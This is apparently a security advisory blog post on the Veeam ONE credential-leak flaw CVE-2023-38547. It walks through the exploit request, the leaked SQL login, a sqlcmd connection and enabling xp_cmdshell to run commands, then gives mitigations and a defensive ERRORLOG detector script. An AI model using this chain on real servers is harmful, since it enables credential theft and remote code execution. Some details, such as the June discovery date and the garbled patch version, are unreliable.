Veeam ONE is a popular monitoring and reporting solution for backup infrastructures—used worldwide by many companies. But in June 2023, a serious security hole, CVE-2023-38547, was found in Veeam ONE. It allows unauthenticated attackers to steal SQL server connection info, which can then be used to run code remotely on the SQL server.
In this post, I’ll explain what this vulnerability is, how it can be exploited, and what you can do to stay safe. I’ll include simple examples and useful links for further research.
What is CVE-2023-38547?
CVE-2023-38547 is an information disclosure vulnerability in Veeam ONE’s web interface. Attackers do not need to log in. They simply send a special web request, and the server responds with critical info about the SQL Server connection used for the Veeam ONE configuration database.
Why is this dangerous?
With these details (such as SQL Server address, database name, username—and sometimes even the password), an attacker can:
- Try to escalate privileges if low-privilege accounts are used
- Even upload and execute malicious code (RCE) on the SQL server host, depending on SQL Server settings
1. Exposing SQL Server Credentials
The vulnerable REST API endpoint on Veeam ONE responds to a request by returning the server’s connection info.
Example HTTP Exploit Request
GET /api/auth/session?anyparam=anyvalue HTTP/1.1
Host: veeamonserver.company.com
Example Server Response
{
"DataSource":"SQLSERVER01.company.com",
"InitialCatalog":"VeeamOne",
"UserID":"veeamoneuser",
"Password":"P@sswrd!",
...
}
(Fields may vary by server version and config.)
Now, the attacker knows where the SQL database lives and what credentials to use.
2. Connecting to the SQL Server
Using something as simple as sqlcmd, or a GUI client like DBeaver, the attacker can connect remotely (provided the SQL Server instance accepts remote logins from their host):
sqlcmd -S SQLSERVER01.company.com -U veeamoneuser -P "P@sswrd!"
Once connected, they can run queries, extract more data, or try to escalate privileges.
3. Achieving Remote Code Execution (RCE)
If the leaked login is highly privileged (such as the sa account) or the instance has dangerous extended stored procedures enabled (xp_cmdshell in particular!), the attacker can execute OS commands on the SQL Server host.
Example: Enabling xp_cmdshell and running a command
-- Enable advanced options
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
-- Enable xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
-- Execute a remote command (e.g., add user, download malware)
EXEC xp_cmdshell 'whoami';
This prints the Windows account the SQL Server service runs as; the same mechanism lets the attacker run any other command, including dropping and launching malware.
Original References
- Veeam Advisory VEEAM-ONE-2023-38547 — Official Veeam security bulletin
- NIST NVD Record CVE-2023-38547
- Rapid7 Analysis
Protecting Yourself
- Update Immediately: Veeam has fixed this in version 12 (12..1.2591). Patch all affected servers.
- Block External Access: Don’t expose the Veeam ONE web interface to the Internet.
- Restrict SQL Server Access: Ensure only intended hosts/users can reach your SQL server.
- Use Strong, Unique Passwords: And never let applications such as Veeam ONE connect as sa or another privileged account unless it is genuinely required.
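As an added defender-side example (not code from the original post or from Veeam), here is a small Python detector run over constructed SQL Server ERRORLOG lines. It flags the xp_cmdshell enable step shown in section 3 and any use of the Veeam ONE SQL login from a host outside the Veeam ONE server's subnet, which covers the "Restrict SQL Server Access" point above. The login name comes from the sample response earlier; the subnet, hosts and log lines are assumed/constructed.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample SQL Server ERRORLOG excerpt (not from the original post).
# The message formats are SQL Server's own; the hosts and timestamps are made up.
SAMPLE_ERRORLOG = """\
2023-11-07 07:15:01.10 Logon       Login succeeded for user 'veeamoneuser'. Connection made using SQL Server authentication. [CLIENT: 10.10.1.20]
2023-11-07 07:16:42.55 Logon       Login succeeded for user 'veeamoneuser'. Connection made using SQL Server authentication. [CLIENT: 203.0.113.77]
2023-11-07 07:17:03.02 spid61      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2023-11-07 07:17:03.40 spid61      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2023-11-07 07:20:00.00 spid61      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

# Assumption: only the Veeam ONE server (placeholder subnet) may use this login.
ALLOWED_CLIENTS = [ip_network("10.10.1.0/24")]
WATCHED_LOGINS = {"veeamoneuser"}  # login name taken from the sample response above

LOGIN_RE = re.compile(r"Login succeeded for user '(?P<user>[^']+)'.*\[CLIENT: (?P<client>[^\]]+)\]")
CONFIG_RE = re.compile(r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)")

def client_allowed(client):
    """Local connections show as '<local machine>'; remote ones must be allowlisted."""
    if client == "<local machine>":
        return True
    try:
        ip = ip_address(client)
    except ValueError:
        return False  # unparseable client field: treat as suspicious
    return any(ip in net for net in ALLOWED_CLIENTS)

def analyze_errorlog(text):
    """Return (timestamp, finding) tuples for lines that deserve an alert."""
    findings = []
    for line in text.splitlines():
        ts = " ".join(line.split()[:2])
        m = LOGIN_RE.search(line)
        if m and m.group("user") in WATCHED_LOGINS and not client_allowed(m.group("client")):
            findings.append((ts, f"{m.group('user')} login from unexpected client {m.group('client')}"))
            continue
        m = CONFIG_RE.search(line)
        # Enabling xp_cmdshell needs sysadmin, so with a least-privilege Veeam login
        # this should never fire; if it does, someone with high rights did it.
        if m and m.group("opt") == "xp_cmdshell" and m.group("new") == "1":
            findings.append((ts, "xp_cmdshell was enabled"))
    return findings

if __name__ == "__main__":
    for ts, msg in analyze_errorlog(SAMPLE_ERRORLOG):
        print(ts, msg)
```

Point it at your real ERRORLOG (or the equivalent SQL Audit export) and adjust ALLOWED_CLIENTS to the hosts that legitimately run Veeam ONE.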
Patch now, and review your DB security!
The bottom line is, don’t delay—even a small leak like server connection info can be a wide-open door for skilled attackers. If you use Veeam ONE, update today.
> Found this helpful? Share with your IT team or customers. Stay safe!
Further Reading
- Veeam Official Security Center
- How Attackers Exploit SQL Server Misconfigurations
- The Dangers of xp_cmdshell
Timeline
Published on: 11/07/2023 07:15:00 UTC
Last modified on: 11/14/2023 19:46:00 UTC